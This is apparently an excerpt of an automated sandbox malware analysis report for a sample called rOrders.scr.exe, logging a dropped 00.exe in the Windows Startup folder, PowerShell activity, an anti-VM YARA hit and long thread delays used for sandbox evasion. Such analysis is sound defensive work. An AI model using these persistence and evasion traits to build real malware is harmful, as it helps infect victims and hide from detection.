Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: rOrders.scr.exe PID: 1848, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 00.exe PID: 6444, type: MEMORYSTR

Source: C:\Users\user\Desktop\rOrders.scr.exe	Memory allocated: 1150000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Memory allocated: 2B90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Memory allocated: 2AE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Memory allocated: 2B10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Memory allocated: 2D80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Memory allocated: 2C80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Memory allocated: 30B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Memory allocated: 3270000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Memory allocated: 5270000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Memory allocated: 1080000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Memory allocated: 2CA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Memory allocated: 4DA0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 599887	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 599531	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 599312	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 599203	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 599094	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 598984	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 598875	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 598765	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 598656	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 598546	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 598437	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 598218	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 598109	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 597890	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 597655	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 597547	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 597437	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 597328	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 597219	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 597109	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 597000	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 596890	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 596781	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 596672	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 596562	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 596453	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 596344	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 596234	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 596125	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 596014	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 595905	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 595797	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 595687	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 595453	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 595344	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 595159	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 594976	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 594859	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 594750	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 594640	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 594531	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 594422	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 594312	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 599750	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 599531	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 599312	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 599203	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 599094	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 598969	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 598859	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 598750	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 598641	Jump to behavior
